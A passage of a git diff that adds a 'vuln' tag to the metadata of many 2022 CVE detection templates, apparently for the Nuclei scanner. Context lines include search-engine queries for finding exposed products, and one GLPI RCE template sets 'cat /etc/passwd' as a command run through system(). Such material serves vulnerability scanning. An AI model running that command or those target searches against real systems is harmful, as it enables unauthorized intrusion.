product: i3geo shodan-query: http.html:"i3geo" fofa-query: body="i3geo" - tags: cve2022,cve,i3geo,xss,softwarepublico + tags: cve2022,cve,i3geo,xss,softwarepublico,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-34121.yaml b/http/cves/2022/CVE-2022-34121.yaml index 7d3c4316bc2..524145c91c4 100644 --- a/http/cves/2022/CVE-2022-34121.yaml +++ b/http/cves/2022/CVE-2022-34121.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: cuppacms product: cuppacms - tags: cve,cve2022,lfi,cuppa,cms,cuppacms,vkev + tags: cve,cve2022,lfi,cuppa,cms,cuppacms,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-34267.yaml b/http/cves/2022/CVE-2022-34267.yaml index 86b4ee7658a..75087327714 100644 --- a/http/cves/2022/CVE-2022-34267.yaml +++ b/http/cves/2022/CVE-2022-34267.yaml @@ -24,7 +24,7 @@ info: vendor: rws product: worldserver shodan-query: title:"WorldServer" - tags: cve,cve2022,worldserver,auth-bypass + tags: cve,cve2022,worldserver,auth-bypass,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-34328.yaml b/http/cves/2022/CVE-2022-34328.yaml index f69eb24dd41..d9d0dfeaf9b 100644 --- a/http/cves/2022/CVE-2022-34328.yaml +++ b/http/cves/2022/CVE-2022-34328.yaml @@ -36,7 +36,7 @@ info: fofa-query: - body="pmb group" - icon_hash=1469328760 - tags: cve,cve2022,pmb,xss,pmb_project,sigb + tags: cve,cve2022,pmb,xss,pmb_project,sigb,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-34534.yaml b/http/cves/2022/CVE-2022-34534.yaml index 1a4d9000c7c..5ff063eb474 100644 --- a/http/cves/2022/CVE-2022-34534.yaml +++ b/http/cves/2022/CVE-2022-34534.yaml @@ -26,7 +26,7 @@ info: - http.favicon.hash:868509217 - http.favicon.hash:"868509217" fofa-query: icon_hash="868509217" - tags: cve,cve2022,digital-watchdog,dw,spectrum,exposure + tags: cve,cve2022,digital-watchdog,dw,spectrum,exposure,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-34576.yaml b/http/cves/2022/CVE-2022-34576.yaml index 02a8d6f0cf9..0c2b7cdc8ee 100644 --- a/http/cves/2022/CVE-2022-34576.yaml +++ b/http/cves/2022/CVE-2022-34576.yaml @@ -36,7 +36,7 @@ info: - title="wi-fi app login" - body="wavlink" google-query: intitle:"wi-fi app login" - tags: cve,cve2022,wavlink,exposure + tags: cve,cve2022,wavlink,exposure,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-34590.yaml b/http/cves/2022/CVE-2022-34590.yaml index 3975d345d42..72c6534b95b 100644 --- a/http/cves/2022/CVE-2022-34590.yaml +++ b/http/cves/2022/CVE-2022-34590.yaml @@ -33,7 +33,7 @@ info: - http.html:"Hospital Management System" - http.html:"hospital management system" fofa-query: body="hospital management system" - tags: cve,cve2022,hms,cms,sqli,hospital_management_system_project + tags: cve,cve2022,hms,cms,sqli,hospital_management_system_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-34753.yaml b/http/cves/2022/CVE-2022-34753.yaml index f412912e958..db60356b8d3 100644 --- a/http/cves/2022/CVE-2022-34753.yaml +++ b/http/cves/2022/CVE-2022-34753.yaml @@ -32,7 +32,7 @@ info: - html:"SpaceLogic C-Bus" - http.html:"spacelogic c-bus" fofa-query: body="spacelogic c-bus" - tags: cve2022,cve,iot,spacelogic,rce,oast,packetstorm,schneider-electric,vkev + tags: cve2022,cve,iot,spacelogic,rce,oast,packetstorm,schneider-electric,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-3477.yaml b/http/cves/2022/CVE-2022-3477.yaml index 6ef7379608f..1c7c27581e6 100644 --- a/http/cves/2022/CVE-2022-3477.yaml +++ b/http/cves/2022/CVE-2022-3477.yaml @@ -24,7 +24,7 @@ info: vendor: newsmag_project product: newsmag framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,auth-bypass,tagdiv,vkev + tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,auth-bypass,tagdiv,vkev,vuln variables: email: "{{email}}" # victim's email address required. diff --git a/http/cves/2022/CVE-2022-3481.yaml b/http/cves/2022/CVE-2022-3481.yaml index a1f08bc8225..42540c19d4f 100644 --- a/http/cves/2022/CVE-2022-3481.yaml +++ b/http/cves/2022/CVE-2022-3481.yaml @@ -21,7 +21,7 @@ info: max-request: 1 verified: true fofa-query: body="/wp-content/plugins/woocommerce-dropshipping" - tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,woocommerce,notificationx,vkev + tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,woocommerce,notificationx,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-3484.yaml b/http/cves/2022/CVE-2022-3484.yaml index 88af0f1dca7..c708534b32c 100644 --- a/http/cves/2022/CVE-2022-3484.yaml +++ b/http/cves/2022/CVE-2022-3484.yaml @@ -29,7 +29,7 @@ info: product: wpb_show_core framework: wordpress google-query: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php - tags: cve,cve2022,wpscan,wp-plugin,wp,wordpress,xss,wpb-show-core,wpb_show_core_project + tags: cve,cve2022,wpscan,wp-plugin,wp,wordpress,xss,wpb-show-core,wpb_show_core_project,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-3506.yaml b/http/cves/2022/CVE-2022-3506.yaml index 0a5d5ed4c2b..8cef04936e2 100644 --- a/http/cves/2022/CVE-2022-3506.yaml +++ b/http/cves/2022/CVE-2022-3506.yaml @@ -30,7 +30,7 @@ info: vendor: never5 product: related_posts framework: wordpress - tags: cve2022,cve,wordpress,wp,wp-plugin,relatedposts,xss,authenticated,huntr,never5 + tags: cve2022,cve,wordpress,wp,wp-plugin,relatedposts,xss,authenticated,huntr,never5,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-35151.yaml b/http/cves/2022/CVE-2022-35151.yaml index f468c2fbddc..8cd9019ecb9 100644 --- a/http/cves/2022/CVE-2022-35151.yaml +++ b/http/cves/2022/CVE-2022-35151.yaml @@ -35,7 +35,7 @@ info: fofa-query: - body="kkfileview" - app="kkfileview" - tags: cve,cve2022,xss,kkfileview,keking + tags: cve,cve2022,xss,kkfileview,keking,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-35405.yaml b/http/cves/2022/CVE-2022-35405.yaml index 02923a63440..2a063da6b95 100644 --- a/http/cves/2022/CVE-2022-35405.yaml +++ b/http/cves/2022/CVE-2022-35405.yaml @@ -33,7 +33,7 @@ info: - http.title:"manageengine" fofa-query: title="manageengine" google-query: intitle:"manageengine" - tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf,kev,zohocorp,vkev + tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf,kev,zohocorp,vkev,vuln http: - method: POST diff --git a/http/cves/2022/CVE-2022-35413.yaml b/http/cves/2022/CVE-2022-35413.yaml index 6e447e7f065..a5113a831bc 100644 --- a/http/cves/2022/CVE-2022-35413.yaml +++ b/http/cves/2022/CVE-2022-35413.yaml @@ -34,7 +34,7 @@ info: - http.title:"intelligent wapples" fofa-query: title="intelligent wapples" google-query: intitle:"intelligent wapples" - tags: cve,cve2022,wapples,firewall,default-login,pentasecurity,vkev + tags: cve,cve2022,wapples,firewall,default-login,pentasecurity,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-35416.yaml b/http/cves/2022/CVE-2022-35416.yaml index ad558b4161b..851b7b18f18 100644 --- a/http/cves/2022/CVE-2022-35416.yaml +++ b/http/cves/2022/CVE-2022-35416.yaml @@ -30,7 +30,7 @@ info: vendor: h3c product: ssl_vpn shodan-query: http.html_hash:510586239 - tags: cve,cve2022,xss,vpn,h3c + tags: cve,cve2022,xss,vpn,h3c,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-35493.yaml b/http/cves/2022/CVE-2022-35493.yaml index f785edd91e7..ccb253332f5 100644 --- a/http/cves/2022/CVE-2022-35493.yaml +++ b/http/cves/2022/CVE-2022-35493.yaml @@ -32,7 +32,7 @@ info: - http.html:"eShop - Multipurpose Ecommerce" - http.html:"eshop - multipurpose ecommerce" fofa-query: body="eshop - multipurpose ecommerce" - tags: cve,cve2022,eshop,xss,wrteam + tags: cve,cve2022,eshop,xss,wrteam,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-35507.yaml b/http/cves/2022/CVE-2022-35507.yaml index 13e1211402f..7f472de02ac 100644 --- a/http/cves/2022/CVE-2022-35507.yaml +++ b/http/cves/2022/CVE-2022-35507.yaml @@ -24,7 +24,7 @@ info: vendor: proxmox product: proxmox_mail_gateway shodan-query: html:"Proxmox = {" - tags: cve,cve2022,proxmox,crlf + tags: cve,cve2022,proxmox,crlf,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-35653.yaml b/http/cves/2022/CVE-2022-35653.yaml index e5af97253f8..dbce9880781 100644 --- a/http/cves/2022/CVE-2022-35653.yaml +++ b/http/cves/2022/CVE-2022-35653.yaml @@ -31,7 +31,7 @@ info: - http.title:"moodle" fofa-query: title="moodle" google-query: intitle:"moodle" - tags: cve,cve2022,moodle,xss,vkev + tags: cve,cve2022,moodle,xss,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-3578.yaml b/http/cves/2022/CVE-2022-3578.yaml index e8935da9863..8c1e1fd87eb 100644 --- a/http/cves/2022/CVE-2022-3578.yaml +++ b/http/cves/2022/CVE-2022-3578.yaml @@ -29,7 +29,7 @@ info: vendor: metagauss product: profilegrid framework: wordpress - tags: cve,cve2022,wp-plugin,wordpress,wpscan,wp,xss,profilegrid,authenticated,metagauss + tags: cve,cve2022,wp-plugin,wordpress,wpscan,wp,xss,profilegrid,authenticated,metagauss,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-3590.yaml b/http/cves/2022/CVE-2022-3590.yaml index 3e8542da5b1..038d2accdf2 100644 --- a/http/cves/2022/CVE-2022-3590.yaml +++ b/http/cves/2022/CVE-2022-3590.yaml @@ -26,7 +26,7 @@ info: - cpe:"cpe:2.3:a:wordpress:wordpress" - http.component:"wordpress" fofa-query: body="oembed" && body="wp-" - tags: cve,cve2022,wordpress,wpscan,ssrf,oast,oob,vkev + tags: cve,cve2022,wordpress,wpscan,ssrf,oast,oob,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2022/CVE-2022-35914.yaml b/http/cves/2022/CVE-2022-35914.yaml index 1c7c5350791..b5e862fc549 100644 --- a/http/cves/2022/CVE-2022-35914.yaml +++ b/http/cves/2022/CVE-2022-35914.yaml @@ -38,7 +38,7 @@ info: - icon_hash="-1474875778" - title="glpi" google-query: intitle:"glpi" - tags: cve,cve2022,glpi,rce,kev,glpi-project,vkev + tags: cve,cve2022,glpi,rce,kev,glpi-project,vkev,vuln variables: cmd: "cat+/etc/passwd" execFunc1: "system" diff --git a/http/cves/2022/CVE-2022-36446.yaml b/http/cves/2022/CVE-2022-36446.yaml index 647caff5bac..f2ca9f0e37d 100644 --- a/http/cves/2022/CVE-2022-36446.yaml +++ b/http/cves/2022/CVE-2022-36446.yaml @@ -33,7 +33,7 @@ info: - http.title:"webmin" fofa-query: title="webmin" google-query: intitle:"webmin" - tags: cve,cve2022,packetstorm,webmin,rce,authenticated,edb + tags: cve,cve2022,packetstorm,webmin,rce,authenticated,edb,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-36537.yaml b/http/cves/2022/CVE-2022-36537.yaml index 60ae3d95a65..ed2fe6b8e60 100644 --- a/http/cves/2022/CVE-2022-36537.yaml +++ b/http/cves/2022/CVE-2022-36537.yaml @@ -34,7 +34,7 @@ info: - http.title:"server backup manager" fofa-query: title="server backup manager" google-query: intitle:"server backup manager" - tags: cve,cve2022,zk-framework,exposure,unauth,kev,intrusive,zkoss,vkev + tags: cve,cve2022,zk-framework,exposure,unauth,kev,intrusive,zkoss,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-36553.yaml b/http/cves/2022/CVE-2022-36553.yaml index 931b7eaf4f7..b3dd74c2418 100644 --- a/http/cves/2022/CVE-2022-36553.yaml +++ b/http/cves/2022/CVE-2022-36553.yaml @@ -27,7 +27,7 @@ info: product: hwl-2511-ss_firmware fofa-query: title="index" && header="lighttpd/1.4.30" zoomeye-query: app="Hytec Inter HWL-2511-SS" - tags: cve2022,cve,hytec,rce,vkev + tags: cve2022,cve,hytec,rce,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-36642.yaml b/http/cves/2022/CVE-2022-36642.yaml index f1c5c2289ef..3688671d091 100644 --- a/http/cves/2022/CVE-2022-36642.yaml +++ b/http/cves/2022/CVE-2022-36642.yaml @@ -33,7 +33,7 @@ info: - http.title:"omnia mpx node | login" fofa-query: title="omnia mpx node | login" google-query: intitle:"omnia mpx node | login" - tags: cve,cve2022,traversal,omnia,edb,lfi,telosalliance,vkev + tags: cve,cve2022,traversal,omnia,edb,lfi,telosalliance,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-36804.yaml b/http/cves/2022/CVE-2022-36804.yaml index 146feaed1d2..fa380552cf6 100644 --- a/http/cves/2022/CVE-2022-36804.yaml +++ b/http/cves/2022/CVE-2022-36804.yaml @@ -29,7 +29,7 @@ info: vendor: atlassian product: bitbucket shodan-query: http.component:"BitBucket" - tags: cve,cve2022,packetstorm,bitbucket,atlassian,kev,vkev + tags: cve,cve2022,packetstorm,bitbucket,atlassian,kev,vkev,vuln variables: data: '{{rand_base(5)}}' diff --git a/http/cves/2022/CVE-2022-36883.yaml b/http/cves/2022/CVE-2022-36883.yaml index f8753d366bc..fe607933a94 100644 --- a/http/cves/2022/CVE-2022-36883.yaml +++ b/http/cves/2022/CVE-2022-36883.yaml @@ -32,7 +32,7 @@ info: shodan-query: - X-Jenkins - x-jenkins - tags: cve,cve2022,jenkins,plugin,git,intrusive + tags: cve,cve2022,jenkins,plugin,git,intrusive,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-37042.yaml b/http/cves/2022/CVE-2022-37042.yaml index 0916f099982..55c6e0ef3a1 100644 --- a/http/cves/2022/CVE-2022-37042.yaml +++ b/http/cves/2022/CVE-2022-37042.yaml @@ -33,7 +33,7 @@ info: - app="zimbra-邮件系统" - icon_hash="475145467" - icon_hash="1624375939" - tags: cve,cve2022,zimbra,rce,unauth,kev,vkev + tags: cve,cve2022,zimbra,rce,unauth,kev,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-37061.yaml b/http/cves/2022/CVE-2022-37061.yaml index fbf0245d8f4..6c01f129f92 100644 --- a/http/cves/2022/CVE-2022-37061.yaml +++ b/http/cves/2022/CVE-2022-37061.yaml @@ -26,7 +26,7 @@ info: product: ax8 shodan-query: title:"FLIR" fofa-query: app="FLIR-AX8" - tags: cve,cve2022,flir,ax8,rce,authenticated,vkev + tags: cve,cve2022,flir,ax8,rce,authenticated,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-37122.yaml b/http/cves/2022/CVE-2022-37122.yaml index 285f12a86ba..9dc6193ab4f 100644 --- a/http/cves/2022/CVE-2022-37122.yaml +++ b/http/cves/2022/CVE-2022-37122.yaml @@ -22,7 +22,7 @@ info: max-request: 1 vendor: carel product: pcoweb_hvac_bacnet_gateway - tags: cve,cve2022,carel,lfi,traversal,unauth,bacnet + tags: cve,cve2022,carel,lfi,traversal,unauth,bacnet,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-37153.yaml b/http/cves/2022/CVE-2022-37153.yaml index 343e0450889..e782e1d2e4e 100644 --- a/http/cves/2022/CVE-2022-37153.yaml +++ b/http/cves/2022/CVE-2022-37153.yaml @@ -31,7 +31,7 @@ info: - http.html:"Artica" - http.html:"artica" fofa-query: body="artica" - tags: cve,cve2022,xss,artica,articatech,vkev + tags: cve,cve2022,xss,artica,articatech,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-37190.yaml b/http/cves/2022/CVE-2022-37190.yaml index 32cab09e90b..d57487ded3b 100644 --- a/http/cves/2022/CVE-2022-37190.yaml +++ b/http/cves/2022/CVE-2022-37190.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: cuppacms product: cuppacms - tags: cve2022,cve,rce,cuppa,authenticated,cuppacms + tags: cve2022,cve,rce,cuppa,authenticated,cuppacms,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-37191.yaml b/http/cves/2022/CVE-2022-37191.yaml index 8c5fdf07362..7b47981a3c2 100644 --- a/http/cves/2022/CVE-2022-37191.yaml +++ b/http/cves/2022/CVE-2022-37191.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: cuppacms product: cuppacms - tags: cve,cve2022,lfi,cuppa,authenticated,cuppacms + tags: cve,cve2022,lfi,cuppa,authenticated,cuppacms,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-37299.yaml b/http/cves/2022/CVE-2022-37299.yaml index a0b8e414798..ea5d94615fe 100644 --- a/http/cves/2022/CVE-2022-37299.yaml +++ b/http/cves/2022/CVE-2022-37299.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: shirne_cms_project product: shirne_cms - tags: cve,cve2022,shirnecms,lfi,shirne_cms_project,vkev + tags: cve,cve2022,shirnecms,lfi,shirne_cms_project,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-3766.yaml b/http/cves/2022/CVE-2022-3766.yaml index 4c45491edc0..e218a8a1194 100644 --- a/http/cves/2022/CVE-2022-3766.yaml +++ b/http/cves/2022/CVE-2022-3766.yaml @@ -29,7 +29,7 @@ info: product: phpmyfaq shodan-query: http.html:"phpmyfaq" fofa-query: body="phpmyfaq" - tags: cve,cve2022,phpmyfaq,xss + tags: cve,cve2022,phpmyfaq,xss,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-3768.yaml b/http/cves/2022/CVE-2022-3768.yaml index 544fea48810..28ebe650056 100644 --- a/http/cves/2022/CVE-2022-3768.yaml +++ b/http/cves/2022/CVE-2022-3768.yaml @@ -29,7 +29,7 @@ info: vendor: wpsmartcontracts product: wpsmartcontracts framework: wordpress - tags: time-based-sqli,cve,cve2022,wp-smart-contracts,wpscan,wp-plugin,sqli,wordpress,wp,authenticated,wpsmartcontracts + tags: time-based-sqli,cve,cve2022,wp-smart-contracts,wpscan,wp-plugin,sqli,wordpress,wp,authenticated,wpsmartcontracts,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-3800.yaml b/http/cves/2022/CVE-2022-3800.yaml index 6cb13b1dd3a..3e4463c7421 100644 --- a/http/cves/2022/CVE-2022-3800.yaml +++ b/http/cves/2022/CVE-2022-3800.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: ibax product: go-ibax - tags: time-based-sqli,cve2022,cve,ibax,go-ibax,sqli + tags: time-based-sqli,cve2022,cve,ibax,go-ibax,sqli,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-3805.yaml b/http/cves/2022/CVE-2022-3805.yaml index 7d392d98f4c..25169d09720 100644 --- a/http/cves/2022/CVE-2022-3805.yaml +++ b/http/cves/2022/CVE-2022-3805.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.html:"/wp-content/plugins/jeg-elementor-kit" fofa-query: body="/wp-content/plugins/jeg-elementor-kit/" publicwww-query: "/wp-content/plugins/jeg-elementor-kit/" - tags: cve,cve2022,wordpress,wp,wp-plugin,jeg-elementor-kit,vkev,unauth,intrusive + tags: cve,cve2022,wordpress,wp,wp-plugin,jeg-elementor-kit,vkev,unauth,intrusive,vuln variables: rand: "{{rand_text_numeric(5)}}" diff --git a/http/cves/2022/CVE-2022-38131.yaml b/http/cves/2022/CVE-2022-38131.yaml index 2eee912e1c9..19a51e8f6fb 100644 --- a/http/cves/2022/CVE-2022-38131.yaml +++ b/http/cves/2022/CVE-2022-38131.yaml @@ -34,7 +34,7 @@ info: - "app=\"RStudio-Connect\"" - title="openvpn connect" google-query: intitle:"openvpn connect" - tags: tenable,cve,cve2022,redirect,rstudio + tags: tenable,cve,cve2022,redirect,rstudio,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-38295.yaml b/http/cves/2022/CVE-2022-38295.yaml index ffa8f09bc98..595f728e7b1 100644 --- a/http/cves/2022/CVE-2022-38295.yaml +++ b/http/cves/2022/CVE-2022-38295.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: cuppacms product: cuppacms - tags: cve2022,cve,xss,cuppa,authenticated,cuppacms + tags: cve2022,cve,xss,cuppa,authenticated,cuppacms,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-38296.yaml b/http/cves/2022/CVE-2022-38296.yaml index af029fb4d03..e41b0329073 100644 --- a/http/cves/2022/CVE-2022-38296.yaml +++ b/http/cves/2022/CVE-2022-38296.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: cuppacms product: cuppacms - tags: cve,cve2022,rce,cuppa,intrusive,cuppacms + tags: cve,cve2022,rce,cuppa,intrusive,cuppacms,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-38322.yaml b/http/cves/2022/CVE-2022-38322.yaml index f63f78589f1..4875fb76634 100644 --- a/http/cves/2022/CVE-2022-38322.yaml +++ b/http/cves/2022/CVE-2022-38322.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"transact sign in","t24 sign in" - tags: cve,cve2022,temenos,transact,xss + tags: cve,cve2022,temenos,transact,xss,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-38463.yaml b/http/cves/2022/CVE-2022-38463.yaml index fc2edcc6af1..7214e6d3946 100644 --- a/http/cves/2022/CVE-2022-38463.yaml +++ b/http/cves/2022/CVE-2022-38463.yaml @@ -37,7 +37,7 @@ info: - title="servicenow" - icon_hash=1701804003 google-query: intitle:"servicenow" - tags: cve,cve2022,servicenow,xss + tags: cve,cve2022,servicenow,xss,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-38467.yaml b/http/cves/2022/CVE-2022-38467.yaml index a754ce7a5f2..2de7fd53638 100644 --- a/http/cves/2022/CVE-2022-38467.yaml +++ b/http/cves/2022/CVE-2022-38467.yaml @@ -29,7 +29,7 @@ info: vendor: crmperks product: crm_perks_forms framework: wordpress - tags: cve2022,cve,crm-perks-forms,wpscan,wordpress,wp,wp-plugin,xss,crmperks + tags: cve2022,cve,crm-perks-forms,wpscan,wordpress,wp,wp-plugin,xss,crmperks,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-38553.yaml b/http/cves/2022/CVE-2022-38553.yaml index dd87cdd7891..a7e57816ae3 100644 --- a/http/cves/2022/CVE-2022-38553.yaml +++ b/http/cves/2022/CVE-2022-38553.yaml @@ -34,7 +34,7 @@ info: google-query: - intext:"Study any topic, anytime" - intext:"study any topic, anytime" - tags: cve2022,cve,academylms,xss,creativeitem + tags: cve2022,cve,academylms,xss,creativeitem,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-38627.yaml b/http/cves/2022/CVE-2022-38627.yaml index 3cf724226db..c3fa6ef05b6 100644 --- a/http/cves/2022/CVE-2022-38627.yaml +++ b/http/cves/2022/CVE-2022-38627.yaml @@ -24,7 +24,7 @@ info: product: emerge_e3_firmware shodan-query: - http.title:"Linear eMerge" - tags: cve,cve2022,emerge,nortek,linear,sqli,vkev + tags: cve,cve2022,emerge,nortek,linear,sqli,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-38637.yaml b/http/cves/2022/CVE-2022-38637.yaml index c492f1a4e4f..e72a3a8cc74 100644 --- a/http/cves/2022/CVE-2022-38637.yaml +++ b/http/cves/2022/CVE-2022-38637.yaml @@ -33,7 +33,7 @@ info: - http.html:"Hospital Management System" - http.html:"hospital management system" fofa-query: body="hospital management system" - tags: cve,cve2022,hms,cms,sqli,auth-bypass,hospital_management_system_project + tags: cve,cve2022,hms,cms,sqli,auth-bypass,hospital_management_system_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-3869.yaml b/http/cves/2022/CVE-2022-3869.yaml index 8464e949b3e..eaa643bb6db 100644 --- a/http/cves/2022/CVE-2022-3869.yaml +++ b/http/cves/2022/CVE-2022-3869.yaml @@ -21,7 +21,7 @@ info: max-request: 1 shodan-query: title:"Froxlor" product: froxlor - tags: cve2023,cve,froxlor,html + tags: cve2023,cve,froxlor,html,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-38794.yaml b/http/cves/2022/CVE-2022-38794.yaml index 5bf0ff9e514..1af32963111 100644 --- a/http/cves/2022/CVE-2022-38794.yaml +++ b/http/cves/2022/CVE-2022-38794.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: zaver_project product: zaver - tags: cve,cve2022,lfi,zaver,zaver_project + tags: cve,cve2022,lfi,zaver,zaver_project,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-38812.yaml b/http/cves/2022/CVE-2022-38812.yaml index 206c9938b7b..d8615cbb0cb 100644 --- a/http/cves/2022/CVE-2022-38812.yaml +++ b/http/cves/2022/CVE-2022-38812.yaml @@ -23,7 +23,7 @@ info: max-request: 2 vendor: aerocms_project product: aerocms - tags: cve,cve2022,aero,cms,sqli,edb + tags: cve,cve2022,aero,cms,sqli,edb,vuln variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-38817.yaml b/http/cves/2022/CVE-2022-38817.yaml index 641cce8e8db..8f757bdeabc 100644 --- a/http/cves/2022/CVE-2022-38817.yaml +++ b/http/cves/2022/CVE-2022-38817.yaml @@ -33,7 +33,7 @@ info: - http.title:"dapr dashboard" fofa-query: title="dapr dashboard" google-query: intitle:"dapr dashboard" - tags: cve,cve2022,dapr,dashboard,unauth,linuxfoundation + tags: cve,cve2022,dapr,dashboard,unauth,linuxfoundation,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-38840.yaml b/http/cves/2022/CVE-2022-38840.yaml index 5c6bda77654..1d0384ebeea 100644 --- a/http/cves/2022/CVE-2022-38840.yaml +++ b/http/cves/2022/CVE-2022-38840.yaml @@ -23,7 +23,7 @@ info: vendor: guralp product: man-eam-0003 google-query: "webconfig menu.cgi" - tags: cve,cve2022,guralp,man-eam-0003,xxe,vkev + tags: cve,cve2022,guralp,man-eam-0003,xxe,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-38870.yaml b/http/cves/2022/CVE-2022-38870.yaml index 1bbf5134ef7..f66e4316447 100644 --- a/http/cves/2022/CVE-2022-38870.yaml +++ b/http/cves/2022/CVE-2022-38870.yaml @@ -33,7 +33,7 @@ info: - http.title:"free5gc web console" fofa-query: title="free5gc web console" google-query: intitle:"free5gc web console" - tags: cve,cve2022,free5gc,exposure + tags: cve,cve2022,free5gc,exposure,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-39048.yaml b/http/cves/2022/CVE-2022-39048.yaml index c7e04e0561e..b6ca827e547 100644 --- a/http/cves/2022/CVE-2022-39048.yaml +++ b/http/cves/2022/CVE-2022-39048.yaml @@ -32,7 +32,7 @@ info: - title="servicenow" - icon_hash=1701804003 google-query: intitle:"servicenow" - tags: cve,cve2022,xss,servicenow,authenticated + tags: cve,cve2022,xss,servicenow,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-3908.yaml b/http/cves/2022/CVE-2022-3908.yaml index bea6137ce7e..b5a9676048e 100644 --- a/http/cves/2022/CVE-2022-3908.yaml +++ b/http/cves/2022/CVE-2022-3908.yaml @@ -27,7 +27,7 @@ info: vendor: helloprint product: helloprint framework: wordpress - tags: cve,cve2022,xss,wordpress,wp-plugin,helloprint,wp,authenticated,wpscan + tags: cve,cve2022,xss,wordpress,wp-plugin,helloprint,wp,authenticated,wpscan,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-39195.yaml b/http/cves/2022/CVE-2022-39195.yaml index 71443a48bf6..d6cf42bb146 100644 --- a/http/cves/2022/CVE-2022-39195.yaml +++ b/http/cves/2022/CVE-2022-39195.yaml @@ -33,7 +33,7 @@ info: - http.html:"LISTSERV" - http.html:"listserv" fofa-query: body="listserv" - tags: cve,cve2022,xss,listserv,packetstorm,lsoft + tags: cve,cve2022,xss,listserv,packetstorm,lsoft,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-3933.yaml b/http/cves/2022/CVE-2022-3933.yaml index e4e5270cf8d..38480b4daf4 100644 --- a/http/cves/2022/CVE-2022-3933.yaml +++ b/http/cves/2022/CVE-2022-3933.yaml @@ -29,7 +29,7 @@ info: vendor: g5theme product: essential_real_estate framework: wordpress - tags: cve,cve2022,wpscan,authenticated,wordpress,wp-plugin,wp,essential-real-estate,xss,g5theme + tags: cve,cve2022,wpscan,authenticated,wordpress,wp-plugin,wp,essential-real-estate,xss,g5theme,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-3934.yaml b/http/cves/2022/CVE-2022-3934.yaml index d3cd80263ff..39bff2cf487 100644 --- a/http/cves/2022/CVE-2022-3934.yaml +++ b/http/cves/2022/CVE-2022-3934.yaml @@ -29,7 +29,7 @@ info: vendor: mehanoid product: flat_pm framework: wordpress - tags: cve2022,cve,authenticated,wpscan,xss,flatpm,wordpress,wp-plugin,mehanoid + tags: cve2022,cve,authenticated,wpscan,xss,flatpm,wordpress,wp-plugin,mehanoid,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml index cea7f308dce..07fd49abb23 100644 --- a/http/cves/2022/CVE-2022-3980.yaml +++ b/http/cves/2022/CVE-2022-3980.yaml @@ -35,7 +35,7 @@ info: - icon_hash=-1274798165 - title="sophos mobile" google-query: intitle:"sophos mobile" - tags: cve,cve2022,xxe,ssrf,sophos,vkev + tags: 